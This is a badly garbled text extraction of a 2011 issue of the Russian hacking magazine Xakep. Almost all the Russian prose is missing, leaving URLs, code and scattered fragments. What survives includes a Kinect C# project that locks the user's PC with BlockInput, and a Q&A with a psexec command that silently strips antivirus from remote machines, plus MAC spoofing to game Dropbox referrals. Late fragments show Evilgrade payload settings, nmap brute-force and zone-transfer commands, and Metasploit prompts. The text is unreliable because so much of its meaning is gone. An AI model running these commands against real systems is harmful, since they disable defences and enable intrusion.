Microsoft $34,99, ,
(s.dealextreme.com/search/kinect+power+supply)
.
.
, Adafruit $3000 ,
. ,
,
github.com/OpenKinect/libfreenect.
,
OpenGL .
, apache 2.0,
,
(java, matlab, python, ruby).
. Kinect Microsoft,
PrimeSence. Kinect , NUI (natural user interface) ,
X 07 /150/ 2011
,
, .
open source-.
.
,
!
, , Faast (goo.gl/
tu8Gs). PrimeSensor : Kinect Camera,
Kinect Motor Kinect Audio.
, OpenNI
PrimeSense NITE.
OpenNI ,

(Natural Interactions). OpenNI , ,
,
. , , :
goo.gl/xRuuU.
NITE , OpenNI. ,
, PrimeSence,
, .
131
PHREAKING
Ultraseven
0KOIk2JeIBYClPWVnMoRKn5cdY4=. .
NITE : goo.gl/6uhJJ.
xml-.
: goo.gl/5e1nz.
, , .
SampleConfig.xml KinectXMLs\OpenNI Data
OpenNI ( , C:\
Program Files\), KinectXMLs\NITE C:\
Program Files\Prime Sense\NITE\Data.
, !
, .
, . Faast (Flexible Action and Articulated Skeleton Toolkit)
,
,
.
,
PC. projects.ict.usc.edu/mxr/faast/.
. , .
, World of Warcraft:
#
# :
# __ __
left_arm_out 10 key a
left_arm_across 10 key d
lean_forwards 15 key w
lean_backwards 10 key s
left_arm_forwards 20 key tab
right_arm_forwards 20 key 1
right_arm_up 12 key 4
right_arm_across 15 key 2
right_arm_out 15 key 3
, , , .
, ,
, .
.
.
132
Kinemote
.
- XBMC . , . kinemote.net.
,
, , ,
, .
Ultraseven
, ,
Ultraseven.
.
, . , ,
,
. ,
. ,
,
. : code.google.
com/p/kinect-ultra/.
! , ,
-,
: , .
OpenNI ( C++, C#) Microsoft Visual Studio 2010,
.
, ,
.
Nui.Vision.dll goo.gl/XNjq4.
.
Visual Studio WPF Application
OpenNi.net.dll (
, OpenNI) Nui.Vision.dll ( ).
.
X 07 /150/ 2011

MainWindow.xaml 662x520 , , ,
:
<Image Name="imgCamera" />
<Canvas Name="LayoutRoot" />
MainWindow.xaml.cs :
using System.ComponentModel; //
using Nui.Vision;
//
NuiUserTracker
. ,
SamplesConfig.xml OpenNI Debug
Release .
:
NuiUserTracker _skeleton; //
BackgroundWorker _worker = new BackgroundWorker();
//
double topY = 0;
//
double bottomY = 0;
//
int numOfBobs = 0;
//
bool bottomPosition, topPosition;
// ,
X 07 /150/ 2011
Ellipse ellipse = new Ellipse //

{ Fill = new SolidColorBrush(Colors.AliceBlue),
Width = 20, Height = 20 };
:
//
_skeleton = new NuiUserTracker("SamplesConfig.xml");
// ,
//
_skeleton.UsersUpdated += new NuiUserTracker.
UserListUpdatedHandler(Skeleton_UsersUpdated);
NuiUserListEventArgs.Users
.
.
,
. .
, . : ,
.
( - ).
, , .
//
// ( )
133
PHREAKING
foreach (var user in e.Users) {

//
if ((topY == 0) && (user.Neck.Y !=0) ) {
//
topY = user.Neck.Y+20;
Line topLine = new Line { //
Y1 = topY,X1 = 0, Y2 = topY, X2 = 662,
Stroke = new SolidColorBrush(Colors.Red),
StrokeThickness = 4 };
//
LayoutRoot.Children.Add(topLine);
//
bottomY = user.Torso.Y + 20;
Line bottomLine = new Line { //
Y1 = bottomY, X1 = 0, Y2 = bottomY, X2 = 662,
Stroke = new SolidColorBrush(Colors.Blue),
StrokeThickness = 4 };
//
LayoutRoot.Children.Add(bottomLine);
//
LayoutRoot.Children.Add(ellipse); }
, :
ellipse.Margin= new Thickness(user.Neck.X, user.Neck.Y,
0, 0); //
//
if (user.Neck.Y+5 < topY) topPosition = true;
//
if (user.Neck.Y + 25 > bottomY) bottomPosition = true;
if (topPosition && bottomPosition) { //
numOfBobs++;
//
topPosition = false;
//
bottomPosition = false;
}
// ,
//
if (numOfBobs >= 20) {
Application.Current.Shutdown(); //
}

. App.xaml.cs :
// ,
//
using System.Runtime.InteropServices;
.
Windows API BlockInput:
public partial class NativeMethods {
[System.Runtime.InteropServices.DllImportAttribute(
"user32.dll", EntryPoint = "BlockInput")]
[return: System.Runtime.InteropServices.MarshalAsAttribute(
System.Runtime.InteropServices.UnmanagedType.Bool)]
public static extern bool BlockInput(
[System.Runtime.InteropServices.MarshalAsAttribute(
System.Runtime.InteropServices.UnmanagedType.Bool)]
bool fBlockIt);
}
App.
xaml .
134
:
using System.Timers;
:
private static System.Timers.Timer TheTimer;
, , :
private void button1_Click(object sender, RoutedEventArgs e)
{
//
TheTimer = new System.Timers.Timer(3600000);
//
TheTimer.Elapsed += new ElapsedEventHandler(BlockPC);
TheTimer.Enabled = true;
}
:
void BlockPC(object source, ElapsedEventArgs e) {
App.NativeMethods.BlockInput(true); //
//
MainWindow w = new MainWindow();
w.Show(); }//

:
//
App.NativeMethods.BlockInput(false);
- , ,
, .
, !
, ,
, .
, 3 4 ,
. 3d-, !
Kinect , ,
.
,
. : iRobot Create ,
Ubuntu ROS
, Kinect .
Willow Garage Turtlebot (willowgarage.com/turtlebot).
Bilibot (bilibot.com),
.
$1200.
. ,
PC, Asus WAVI Xtion. ,
, , ,
, ,
, . z
X 07 /150/ 2011
PHREAKING
(po@kumekay.com)
-
, . ,

.
.
,
, .

.
. ,
!
- .
made in China. eBay ,
. , , ,

136
. !
dealextreme.com, 50 000 . focalprice.com
kaidomain.com. buyincoins.com,
, .
, .
-, - (dealextreme.com/gift-ideas) .
paypal,
( Maestro Visa-Electron).
paypal.com ,
, .

ebay-forum.ru. .
X 07 /150/ 2011
,
. ,
!
DealExtreme , 12
. ,
, .
: dealextreme.com/details.dx/sku.35199 $19. stere amp,
, .

, , ,
.
, . mp3-,
usb- sdhc, ,
, , , .
! , .
mp3- .
, ,
, , .
, USB SD . ,
:
1. ;
2. ;
3. USB/SD;
4. ( );
5. /;
6. ( ).
. ,

.
,
: dealextreme.com/details.
dx/sku.27987.
, , !
10 13 , 500-700 ,
.
X 07 /150/ 2011
, -
! -, ,
.
, .
( ),
.
12
s.dealextreme.com/search/EL+Strip. ,

( ),
. ,
,
, -
.
BMW- (dealextreme.com/p/25513).
, ,
-:
(dealextreme.com/p/43968), - , (dealextreme.com/p/44281),
12- , , .
, , . , .
, .
, ePad buyincoins.com/details/epad-7-touch-mid-notebookandroid-usb-enthernet-rj45-product-1851.html. ,
ARM- VIA VT8505
450 MHz ,
, . 7
( 800x480)
-
-.
, .
, 7" Dropad (dealextreme.com/p/71932)
Cortex A8
DJ- (market.android.com/details?id=com.beatronik.
djstudio), GPS
.
137
PHREAKING
. , , ,
. EDGE
3G- .
, ,
, . Wi-Fi. USB 3G-
Wi-Fi . USB 3G- ,
,
( Huawei ZTE)
700-1000 . Wi-Fi ( USB-),
dd-wrt (dd-wrt.com)
3G- , , dealextreme.com/p/59040.
dealextreme.
com/p/51797, ,
20 ,
. android Dropad,
USB- . android- 2.2, 3G Wi-Fi, , Barnalce
WiFi Tether (market.android.com/details?id=net.szym.barnacle).
,
- . mp3-, fm-, (dealextreme.com/p/625),
. ,
Bluetooth- (dealextreme.com/p/14956),
.
, .
,
,
. -
138
FM-
USB-
200
60
600
150
1000
60
500
90
70
150
90
530
200
300
4000
,
. -
. ,
35 /, . ,
,
7-12 / ,
. ,
, (dealextreme.com/p/ 71635)
. ,
, 3-4 .
:
(dealextreme.com/p/ 35190),
X 07 /150/ 2011

: NiCd, NiMH, LiIon, LiPo, LiFe , ,
-. ,
5 , ,
, ,
- .
12- . , . 12
2,1
5,5 , ,
. -
. .
,
:
5 : USB-,
, . , (dealextreme.com/p/58012)!
(dealextreme.com/p/34674).
microUSB, miniUSB, nokia, iPhone, SE, LG ..
1,5-12 : , 220
, , 6-9 .
, Wi-Fi ,
. (dealextreme.
com/p/90021) .
12-24 : 19-20 , (dealextreme.
com/p/3438).
.
220 : - ,
220 . , ,
,
100 . focalprice.com/
ERK80S/100W_DC_12V_to_AC_220V_Power_Inverter_Kit_Silver.html.

. , .

,
.
:
1. , ,
.
2.
.
3. .
X 07 /150/ 2011
mp3
C
4. .
5. .
,
,
. ,
.
- ,
,
. ( ).

,
(
), .
,
.

,
( 50 ). ,
.
,
. ,
, . ,
,
, ,
! z
139
UNITS
Step (twitter.com/stepah)
faq
united?

faq@real.xakep.ru
Q: , ,
?
A: , -
, Google
Analytics (www.google.com/analytics).
(
) .
,
. ,
, .

GA ( JS-,
-

Google),
_trackPageLoadTime(), _trackPageview():
// GA:
_gaq.push(['_trackPageview']);
_gaq.push(['_trackPageLoadTime']);
// GA:
pageTracker._trackPageview();
pageTracker._trackPageLoadTime();

.
,
.
140
Q: Windows
?
?
A: ,
,
Backup
Utility (code.google.com/p/backup-utility-4)
DataGrab (sites.google.com/a/obxcompguy.
com/foolish-it/vb6-projects/datagrab), .

(
),

. , ,
,
exe-.
Q: SOCKS5-,
Linux.
A: , , , Linux-
:
ssh -N -D 0.0.0.0:1080 localhost
,
( -D) 1080 SOCKS4 SOCKS5 ( ,
SOCKS5-).
-N , idle- -
localhost.
ssh ,
-f. , .
,
iptables:
Q:
iptables -A INPUT --src 1.2.3.4 -p tcp
- . ,
--dport 1080 -j ACCEPT
, , iptables -A INPUT -p tcp --dport 1080 -j

REJECT
.
?
A: . IP- 1.2.3.4
Apple,
(WTF?!).
www.myfax.com/free.
, .
( 1080 ).
,
, ,

proxy-, Perl, TCP
X 07 /150/ 2011
SQLiteSpy
SQLite

proxy (github.com/pkrumins/perl-tcp-proxy).
IP-
( @allowed_ips). TCP proxy
SOCKS- , . SSH
-:
ssh -N -D 55555 localhost
SOCKS , ,
localhost.
Q: , (
) , Windows?
A:
Windows,
(SRP).
,
(GPO).
,
( ) ,

. ,
,

:
C:\Windows\explorer.exe
C:\Windows\System32\csrss.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\rdclip.exe
C:\Windows\System32\taskhost.exe
C:\Windows\System32\TSTheme.exe
C:\Windows\System32\userinit.exe

. :
X 07 /150/ 2011
1. (
mmc).
2.
.
3.
(GPO).
4. .
5. , ,
GPO.
6. .

< .
7. Windows

.
8. .
.
9.

.
,
.
10.
. ,
(,
%HKEY_LOCAL_MACHINE\...).
11. ,
,
,
.

, .
Q:
?
A: - ,
SQLite (www.sqlite.org),

.
SQLite
(
Mac OS iPhone OS, Android).
SQLite
sqlite3

PMD
GUI- SQLite Browser
(sqlitebrowser.sourceforge.net), SQLiteSpy
(www.yunqa.de/delphi/doku.php/products/
sqlitespy/index) SQLite Manager (addons.
mozilla.org/ru/firefox/addon/sqlite-manager).
, SQLite,

(bit.ly/mCQlxA).
Q: ?
A: ,
:
$ python -m SimpleHTTPServer
8000 (
) -
(.. , ).
(
0.0.0.0). index.htm,

. ,
.
.
, Python
SimpleHTTPServer.
Python Linux-,
.

, .
Q:
?
A: ,
, .
,

Symantec Antivirus.

,

( , ).
(
),
,
.

141
UNITS
. 300
?
, ,
.
HKEY_LOCAL_MACHINE\
SOFTWARE\MICROSOFT\WINDOWS\CURRENT
VERSION\UNINSTALL ,
Symantec Antivirus.
{BA4B71D1-898E4306-AE87-8BA7A596F0ED}.
UninstallString ,

MsiExec.exe.

,
.
- . ,
MsiExec.exe,
:
MsiExec.exe /norestart /q/x{BA4B71D1898E-4306-AE87-8BA7A596F0ED}
REMOVE=ALL
,

:
psexec \\computer_name MsiExec.exe /
norestart /q/x{BA4B71D1-898E-4306AE87-8BA7A596F0ED} REMOVE=ALL
,
,
, .
Q:
Dropbox,
? email
: -

.
A: , .
Dropbox-,
: .

. , Dropbox
MAC-.
, 250 Dropbox,
:
1. email.
2. , .
Linux Mac-
ifconfig,
Technitium MAC Address Changer v5 Release 3
(www.technitium.com). ,
, -
142
Dropbox
(habrahabr.ru/blogs/services/120526).

?
A: , , ,
Q: , ?
JavaScript ,
HTML- ( )
DOM.
?
A: :
PowerShell (
Windows 7 Windows Server 2008 R2).
:
1. System.IO.FileSystemWatcher
:

? , ,

(sreznikov.blogspot.com). , ,
. ,
String supplant,
,
{}. ,
,
,
.
$watcher = New-Object System.

IO.FileSystemWatcher
$watcher.Path = $searchPath
$watcher.IncludeSubdirectories = $true
$watcher.EnableRaisingEvents = $true
String.prototype.supplant =
function(o) {
return this.replace(/{([^{}]*)}/g,
function(a, b) {
var r = o[b];
return typeof r === 'string' ||
typeof r === 'number' ? r : a;
}
);
};
. :
var data = {
url: '/test/',
thumb_src: 'test.gif',
thumb_width: 60,
thumb_height: 30,
caption: '-!'
};
supplant,
:
var template = '<div class="preview">
<p class="image"><a href="{url}"><img
src="{thumb_src}" width="{thumb_
width}" height="{thumb_height}"/></
a></p><p class="caption">{caption}</
p></div>';
var result = template.supplant(data);
, ,
(createElement)
(appendChild) DOM.
Q: , API,

.Path , .
.IncludeSubdirectories
.
2. ,
, $watcher
.
:
$changed = Register-ObjectEvent
$watcher "Changed" -Action {
write-host "Changed: $($eventArgs.
FullPath)"}

, .
, .
3. , Powershell, :
Unregister-Event $changed.Id
,
PowerShell,
. PowerGUI (www.
powergui.org) ,
.
Q: ?
: PE-,
?
,
:).
A: .
Process Memory Dumper (evilfingers.com/
tools//ProcessMemoryDumper.php),

PMD. GUI-,

DumpedProcess.dmp,

. z
X 07 /150/ 2011
>Net
ApacheConf Lite 7.1
DragonDisk for Windows 0.8.1
DU Meter 5
Firewall Builder 4.2.2
Gladinet Cloud Desktop Starter
Edition 3.2
Host Profiles 1.0
Htpasswd Generator 4.1.1
inSSIDer 2.0.7
>Multimedia
FinePrint 6.20
ImgBurn 2.5.5.0
IsoBuster 2.8.5
Kindle for PC 1.5.0
Nemo Documents
Oxelon Media Converter 1.1
pdfFactory 4.10
SumatraPDF 1.6
VidCoder 0.9.2
Virtual CloneDrive 5.4.5.0
VirtualDub 1.9.11
>Misc
allsnap v1.50beta
AtomicDic 0.2.1
AutoHotkey_L
Bins
Chameleon Window Manager
1.1.0.126
ClipX 1.0.3.9 beta 7 x86
DropIt 2.6
Free Opener 1.0
Handy Shortcuts
Hot Corners 2.2.2.0
JumpPad 2.1
Launch 2.6 Beta2
MouseExtender 1.9.9.3
NTFS Permissions Tools 0.9.9
QTTabBar 1.2.2.1
SmartGUI Creator 4.0
Switcher 2.0.0
Synergy 1.4.2 beta
Taskbar Shuffle 2.5
TrayScript 1.0
TreeSize Free V2.51
>MAC
Book Hunter 1.1.10
Breakaway 2.0
CocoaPacketAnalyzer 0.72
DVD Hunter 1.1.10
Mactracker 6.0.2
Meteorologist 1.5.5
Neuronyx 2.4.5
Nocturne 2.0
Quicksilver 60
Roccat Browser 1.5
ShellBar 1.0
SoundCloud 1.1.0
Spotify 0.5.1.98
SunFlower 0.13
TeamViewer 6.0
Visor 1.9
VLC 1.1.10
VUWER 1.4.6
WireShark 1.6.0
>System
Dependency Walker 2.2
EASIS Drive Check
KeePass 2.15
Listary
Locate32 3.0.7
Master Commander 1.0.1
McAfee ShareScan
Menu Uninstaller 1.2.1
MiniTool Power Data Recovery Free
Edition 6.5
NexusFile 5.3.1
RegASSASSIN
SandboxDiff 2.3
Service monitor
StressMyPC 1.01
SuperF4 1.2
TrayStatus 1.2.3
TrueCrypt 7.0a
USB Disks Access Manager 1.0
>Security
BurpSuite 1.4
DirectoryScanner 1.0
DOMinator
EchoMirage 1-2
Enhanced Mitigation Experience
Toolkit v2.1
Microsoft Web Application
Configuration Analyzer v2.0
nuf-fuzzer
PANBuster v1.0
peepdf 0.1
rkanalyzer
SiteDigger v3.0
w3af 1.0
yara-project 1.5
YETI
Odysseus-2-0-0-84
Pidgin OTR 3.2.0
Psi 0.14
RoboForm Everywhere v7.3.2
WinSCP 4.3.3
>Net
Firefox 4.0.1
Google Chrome 12
gWakeOnLan 0.5.1
IGMPproxy 0.1
ipvs 1.2.1
KVIrc 4.0.2
>System
Bacula 5.0.3
Glibc 2.14
GNU Parted 3.0
Grub 1.99
HDFS 0.21.0
Heartbeat 2.1.4
Libertine 5.0
Linux Kernel 2.6.39.1
Redis 2.2.8
Sentinella 0.9.0
Slony-1 2.0.6
Syslog-ng 3.2.4
>Games
Warzone 2100 2.3.8
>Devel
Flot 0.7
GiNaC 1.6.0
Google Web Toolkit 2.3
Memcached 1.4.5
Nemerle 1.0
Nodejs 0.4.8
Netty 3.2.4
NumPy 1.6.0
Perl 5.14
phpMyAdmin 3.4.0
Prettify
Qwt 6.0.0
Scala 2.9.0.1
Scala IDE
Tcc 0.9.25
Thrift 0.6.1
Twisted 11.0.0
XCache 1.3.2
>>UNIX
>Desktop
AbiWord 2.8.6
Floola 2011r3
Fontmatrix 0.6.0
FreeArc 0.666
Frinika 0.5.1
gLabels 3.0.0
Gramps 3.2.6
keyTouch 2.4.1
Launchy 2.5
LuxRender 0.8
Metromap 0.1.3
PiTiVi 0.14
QSapecNG 1.2.2
Remuco 0.9.5
Sage 4.7
SimpleBurn 1.6.2.1
soundKonverter 1.0.0
Workrave 1.9.4
>>
""

>X-Distr
BackTrack 5
>Server
Apache 2.2.19
Berkeley DB 5.1.25
BIND 9.8.0
CUPS 1.4.6
DHCP 4.2.1
FlockDB 1.8.0
JBossAS 6.0.0
Lucene 3.2
OpenLDAP 2.4.25
OpenSSH 5.8
OpenVPN 2.2.0
Postfix 2.8.3
PostgreSQL 9.0.4
Samba 3.5.8
Sendmail 8.14.5
Squid 3.1.12
Tomcat 7.0.4
>Security
Burp Suite 1.4
EAPeak 0.1.0
Fimap 0.9
Ghost-Phisher 1.1
Iptables 1.4.11.1
Metasploit Framework 3.7.1
Ncrack 0.04a
Portsentry 1.2
Pytbull 1.1
Radare2 0.7
RIPS 0.40
SIPVicious 0.2.6
Skipfish 1.91
Sniffjoke 0.4.1
w3af 1.0
Wireshark 1.6.0
Xplico 0.6.3
Zed Attack Proxy 1.3.0
Opera 11.11
PgBouncer 1.4.1
qBittorrent 2.8
SeaMonkey 2.0.14
SIM 0.9.4.3
SPGT 0.1
Subsonic 4.4
Tcpdump 4.1.1
Thunderbird 3.1
Transmission 2.31
Udpxy 1.0
XChat 2.8.9
[1-150]. C 1999
150
07(150) 2011
>>WINDOWS
>Development
API Monitor v2 (Alpha-r7)
AsmJit 0.8.6
AsmJit 1.0beta2
Beyond Compare 3
Easy Query Builder
Git 1.7.4
intype 0.3.1
Mercurial 1.8.4
SQLite Manager 0.7.4
SQLite Precompiled Binaries For
Windows
SQLiteSpy 1.9.0
SQLyog Community Edition - 9.10
Titanium Studio Release Candidate 1
XML Notepad 2007
x 07 (150) 2011
07 (150) 2011
c 1999
[1-150]

: 2
10
.
UNITS
HTTP://WWW2
MINUS
min.us
PAGE2RSS
page2rss.com
-,

. Dropbox Public
. min.us ,
. ( Windows, Mac, Linux)

dragndrop, ,
. (Android, iOS, WP7),
.
RSS-,
, ,
- RSS-.
, ? Google Reader
( RSS- Google) ,
RSS-. ,
RSS-, .

page2rss. ,
.
VISUALLAND
visualland.net
PILOTHANDWITING
pilothandwriting.com
ARP, DNS, DHCP, ICMP

.. , ,
, ,
RFC . visualland.

. . , : ,
, ,
. : bit.ly/Jasper_here.
,
. A4,
.
-
. ,
PilotHandwiting .
, ,
.
144
X 07 /150/ 2011
>> coding

e1$m
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
X 10 /141/ 10

Хакер 2011 07 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 07 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

Positive Hack Days 2011

.: (495) 935-7034, : (495) 545-0906

... Google. 2011

IPS-, FireWire 800, 4 USB 2.0, SDXC, SuperDrive (DVD-RW), Gigabit

. , 2010 Mail.ru Group

Xbox, Kinect Windows Phone

: Intel Core i7-975 Extreme, @ 3466

: Corsair CSSD-F120GB2, 120

Corsair CSSD-F40GB2 SSD-

Silicon Power SP128GBSSDE20S25

Who is who PCMark Vantage

IOmeter sequential 128 , /

PCMark Vantage , SSD

WEXLER.BOOK T7002 WEXLER,

WAV (32/45 /). :

GTalk Service Monitor

POST- Android Market

, GTalkService Android Market. .

Git. , , FTP SVN

Ubuntu 8.04 torpeda tty1

Evilgrade agent, (payload). , ,

ppm install http://www.sisyphusion.tk/ppm/NetSSLeay.ppd

> set atitle "New version available"

{ 'val' => './agent/java/javaws.exe',

192.168.0.1 1521 Oracle;

nmap --script oracle-brute -p 1521 --script-args oraclebrute.sid=ORCL <target>

nmap -p53 script dns-zone-transfer script-args

msf exploit(wireshark_packet_dect) > use exploit/windows/

ZYXEL ZYWALL USG

XSS WordPress SermonBrowser

W3C Widgets specification.

XSS Google Mail Notifier

var msg = eval("(" + response_text + ")");

Google Chrome, Opera

Rockwell Automation 45%

Schneier Electrics 40%

Areva Teleperm XS 25%

Wonderware InTouch 30%

Tekla XPower 20%

Mitsubishi MX4 SCADA 30%

Netcon 3000 15%

Wonderware InTouch 45%

RTA PLS 55%

Wonderware InTouch 44%

Siemens Win CC 49%

SOLONs SCADA 34%

ABB Ranger 34%

SCADA Axeda 22%

View Star 750 55%

Proficy SCADA iFIX 30%

Siemens Win CC 45%

5) TCP 3050 ( Firebird):

Music Maker 16, .

metaploit- pvefindaddr , SEH

: Hack Record Book

Capture the flag

(Positive Hack Days). ?

[M]: PHD 2011

[]: PHD 2012

Positive Hack Days : ,

Facebook Hacker Cup